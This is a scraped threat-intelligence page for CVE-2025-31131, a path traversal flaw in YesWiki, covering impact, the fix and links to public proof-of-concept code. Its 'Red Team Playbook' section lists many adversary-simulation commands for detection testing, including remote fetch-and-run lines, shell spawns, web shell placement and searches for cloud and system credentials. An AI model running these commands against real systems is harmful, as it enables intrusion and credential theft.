CVE-2025-31131
Overview
This vulnerability is a path traversal flaw (CWE-22) in the YesWiki PHP application. The root cause lies in insufficient sanitization of the 'squelette' parameter, which is used to specify template files. This allows manipulation of file paths, enabling unauthorized access to arbitrary files within the server's filesystem.
Vulnerability Description
YesWiki is a wiki system written in PHP. The squelette parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server. This vulnerability is fixed in 4.5.2.
Impact
An unauthenticated remote attacker can exploit this vulnerability to read sensitive files on the server by manipulating the 'squelette' parameter. This can lead to exposure of configuration files, credentials, or other sensitive data. The attack requires only network access to the vulnerable YesWiki instance and no user interaction, as indicated by the CVSS vector AV:N/AC:L/PR:N/UI:N. This can facilitate further attacks such as information disclosure and lateral movement within the target environment.
Solution
To remediate this vulnerability, users must upgrade YesWiki to version 4.5.2 or later, as specified in the GitHub security advisory GHSA-w34w-fvp3-68xm. The patch commit f78c915369a60c74ab8f38561ae93a4aaca9b989 includes the necessary input validation fixes for the 'squelette' parameter. Administrators should follow the instructions in the official advisory for applying the update to ensure the vulnerability is fully addressed.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the YesWiki system arises from improper validation of user input, specifically concerning the "squelette" parameter. This flaw allows an attacker to manipulate the input to perform path traversal attacks. By exploiting this weakness, an attacker can craft a request that traverses the file system, potentially gaining access to sensitive files outside the intended directory. The underlying issue is rooted in the way the application constructs file paths without sufficient sanitization or validation, which is a common pitfall in web applications that handle user inputs. This vulnerability underscores the importance of implementing robust input validation mechanisms to prevent unauthorized access to the file system.
Attack vectors for this vulnerability are relatively straightforward, as they primarily involve sending specially crafted requests to the YesWiki application. An attacker could leverage tools such as curl or custom scripts to automate the exploitation process. By injecting path traversal sequences (e.g., "../") into the "squelette" parameter, the attacker can navigate the file system hierarchy and access files that should be restricted. For example, an attacker might attempt to read configuration files, user data, or other sensitive information stored on the server. The ease of exploitation, combined with the potential for significant data exposure, makes this vulnerability particularly concerning.
The real-world impact of this vulnerability can be severe, especially for organizations that rely on YesWiki for documentation or collaborative purposes. Unauthorized access to sensitive files could lead to data breaches, exposing confidential information such as user credentials, proprietary data, or internal communications. The business risks associated with such breaches include reputational damage, regulatory penalties, and financial losses. Furthermore, the presence of this vulnerability may undermine customer trust, as users expect that their data is secure when using collaborative platforms. Organizations must recognize that the consequences of exploitation extend beyond immediate financial implications, affecting long-term business viability.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, regular security assessments and code reviews can help identify and remediate vulnerabilities in the application before they can be exploited. Automated tools can assist in scanning for path traversal vulnerabilities, but manual reviews are also essential to catch more subtle issues. Additionally, organizations should ensure that they are running the latest version of YesWiki, as the vulnerability has been addressed in version 4.5.2. Keeping software up to date is a fundamental practice in cybersecurity, as it helps protect against known vulnerabilities.
Furthermore, implementing a web application firewall (WAF) can provide an additional layer of defense by filtering out malicious requests before they reach the application. Configuring the WAF to recognize and block path traversal patterns can significantly reduce the risk of exploitation. Lastly, organizations should adopt a principle of least privilege for file access, ensuring that the web application only has access to the files necessary for its operation. By combining these detection and mitigation strategies, organizations can effectively reduce their exposure to this vulnerability and enhance their overall security posture.
CSURFACE threat intelligence has identified a significant increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-31131, rising by over 46% to place it near the 94th percentile of exploit likelihood. This upward adjustment reflects growing confidence in the vulnerability’s exploitability, likely influenced by the recent emergence of multiple publicly available proof-of-concept exploits on prominent platforms. Our telemetry indicates that while exploitation attempts have stabilized over the past week, the availability of these exploits lowers the barrier to attack, potentially broadening the pool of adversaries capable of leveraging this path traversal flaw. For defenders, this shift underscores an elevated risk environment where opportunistic attackers may increasingly target vulnerable YesWiki deployments. Consequently, the threat level for CVE-2025-31131 should be considered heightened, warranting increased vigilance and prioritization in vulnerability management workflows.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Yeswiki | Yeswiki | All |
cpe:2.3:a:yeswiki:yeswiki:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| YesWiki 4.5.1 - Unauthenticated Path Traversal | Al Baradi Joy | webapps | multiple | - | View |
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
MuhammadWaseem29/CVE-2025-31131
YesWiki is a wiki system written in PHP. The squelette parameter is vulnerable to path traversal attacks, enabling read ...
|
MuhammadWaseem29 | 1 | 0 | 2025-04-04 | View |
|
gmh5225/Blackash-CVE-2025-31131
CVE-2025-31131
|
gmh5225 | 0 | 1 | 2025-06-07 | View |
Threat Feed
2 eventsProof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-31131 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/YesWiki/yeswiki/security/advisories/GHSA-w34w-fvp3-68xm |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/YesWiki/yeswiki/commit/f78c915369a60c74ab8f38561ae93a4aaca9b989 |